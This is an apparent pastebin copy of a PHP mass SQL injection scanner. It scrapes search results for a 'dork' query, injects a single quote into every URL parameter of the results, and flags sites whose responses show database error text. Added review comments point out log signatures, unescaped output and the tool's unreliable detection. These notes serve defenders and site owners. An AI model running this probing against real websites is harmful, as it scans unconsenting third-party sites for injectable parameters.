
m0bil3_xT's PHP Online SQLi Scanner

a guest
Jul 25th, 2012
<html>
<head>
<title>m0bil3_xT's SQLi Scanner</title>

<center><img src="http://i.imgur.com/lH3GO.png">
</center>

</head>
<body bgcolor=#000000>

<style>
body{
font: 10pt Verdana;
}
tr {
BORDER-RIGHT: #3e3e3e 1px solid;
BORDER-TOP: #3e3e3e 1px solid;
BORDER-LEFT: #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
color: #ff9900;
}
td {
BORDER-RIGHT: #3e3e3e 1px solid;
BORDER-TOP: #3e3e3e 1px solid;
BORDER-LEFT: #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
color: #2BA8EC;
font: 10pt Verdana;
}

table {
BORDER-RIGHT: #3e3e3e 1px solid;
BORDER-TOP: #3e3e3e 1px solid;
BORDER-LEFT: #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: #111;
}


input {
BORDER-RIGHT: #3e3e3e 1px solid;
BORDER-TOP: #3e3e3e 1px solid;
BORDER-LEFT: #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: Black;
font: 10pt Verdana;
color: #ff9900;
}

input.submit {
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #FFFFFF;
border-color: #009900;
}

code {
border : dashed 0px #333;
BACKGROUND-COLOR: Black;
font: 10pt Verdana bold;
color: while;
}

run {
border : dashed 0px #333;
font: 10pt Verdana bold;
color: #FF00AA;
}

textarea {
BORDER-RIGHT: #3e3e3e 1px solid;
BORDER-TOP: #3e3e3e 1px solid;
BORDER-LEFT: #3e3e3e 1px solid;
BORDER-BOTTOM: #3e3e3e 1px solid;
BACKGROUND-COLOR: #1b1b1b;
font: Fixedsys bold;
color: #aaa;
}
A:link {
COLOR: #2BA8EC; TEXT-DECORATION: none
}
A:visited {
COLOR: #2BA8EC; TEXT-DECORATION: none
}
A:hover {
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #ff9900; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}

.listdir tr:hover{
background: #444;
}
.listdir tr:hover td{
background: #444;
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #FFFFFF; TEXT-DECORATION: none;
}
.notline{
background: #111;
}
.line{
background: #222;
}
</style>

<center>
<br/>

<?php

// Review notes (comments only; the code is unchanged).
// What the page does: prints a banner, the requester's address and the address
// the Host header resolves to, then a one-field form ("dork"). On submit it
// pulls search-result pages for that query, rewrites every "=" in each result
// link to "='", fetches the rewritten link and labels it by matching the
// response body against a list of MySQL/PHP error strings.
// Where it matters for defenders:
//  - the probe traffic has two fixed traits that show up in access logs (see
//    the notes at the cURL calls and at the preg_replace() call below);
//  - nothing in this file restricts who may submit the form or how often, so a
//    copy found on a web server you operate makes that server the source of
//    the outbound requests.

echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,

0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px

rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'

size='5'></font></b><br><br><center><a href='

target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,

0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;

font-weight:bold;' size='2'></font><br><br></center>";

// REMOTE_ADDR is the peer address as the web server sees it; it is
// interpolated into the markup as-is.
$your_ip = $_SERVER['REMOTE_ADDR'];
echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000

size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;

font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";

// HTTP_HOST comes from the request's Host header, so the client chooses the
// name that is resolved here. gethostbyname() returns its argument unchanged
// when resolution fails, and the result is echoed below without
// htmlspecialchars(). The "@" also hides any warning from the lookup.
$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000

size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;

font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";

// The form posts back to the same URL; no login check or request token is
// visible in front of it.
echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"

value="" name="dork" size="20"/><input type="submit" name="scan"

value="Scan"></form></center>';

// set_time_limit(0) removes PHP's execution-time cap for this request; with
// the nested loops below, a single POST can keep a worker busy for a long time.
ob_start();
set_time_limit(0);

if (isset($_POST['scan'])) {

// The visitor's User-Agent is read here but never sent: see the cURL calls.
$browser = $_SERVER['HTTP_USER_AGENT'];

// Search front-end that receives the query, its paging parameter, and the
// pattern used to pull result links out of the returned HTML.
$first = "startgoogle.startpagina.nl/index.php?q=";
$sec = "&start=";
$reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';

// 31 iterations: $page runs 0, 10, ..., 300.
for($id=0 ; $id<=30; $id++){
$page=$id*10;
// urlencode() keeps the submitted text inside the q= parameter.
$dork=urlencode($_POST['dork']);
$url = $first.$dork.$sec.$page;

// '$browser)' is single-quoted, so PHP does not interpolate it: the User-Agent
// header sent is the literal text $browser) - a stable string to look for in
// access logs. The return value of curl_exec() is not checked; a failed fetch
// is handed to the regex as false.
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
$result = curl_exec($curl);
curl_close($curl);

preg_match_all($reg,$result,$matches);

foreach($matches[1] as $site){

// Every "=" in the scraped link becomes "='", so each parameter value arrives
// with a leading single quote. A query string with a quote directly after
// every "=" is the second log-visible trait of this script.
// $site is whatever the regex captured from remote HTML; it is not validated
// as a URL before being fetched or printed.
$url = preg_replace("/=/", "='", $site);
// This handle is never passed to curl_close(), so handles accumulate for the
// lifetime of the request. The same literal User-Agent is used; each fetch is
// capped at 5 seconds.
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
curl_setopt($curl,CURLOPT_TIMEOUT,'5');
$GET=curl_exec($curl);
// Heuristic only: the response body is searched for MySQL/PHP error text. As
// pasted, the pattern literal runs over several lines, so those line breaks
// are part of the pattern, and alternatives such as "Syntax error" and
// "Fatal error" are not specific to SQL. Neither label printed below is
// evidence of whether a site is injectable.
// For site owners the durable fix is parameterised queries; keeping database
// and PHP error text out of responses removes the signal this check keys on
// but does not repair an injectable query.
if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute

query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row

()|SELECT *

FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
// $url originates from third-party HTML and is concatenated into an href and
// into the page body without htmlspecialchars(), so markup contained in a
// scraped link is rendered in the browser of whoever is viewing this page.
echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"

target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln

Found..</font></b></center>';
ob_flush();flush();
}else{
// Same unescaped output of $url as in the branch above.
echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">

&#60;-- Not Vuln</font></center>';
ob_flush();flush();
}

ob_flush();flush();
}
ob_flush();flush();
}
ob_flush();flush();
}

?>
</body>
</html>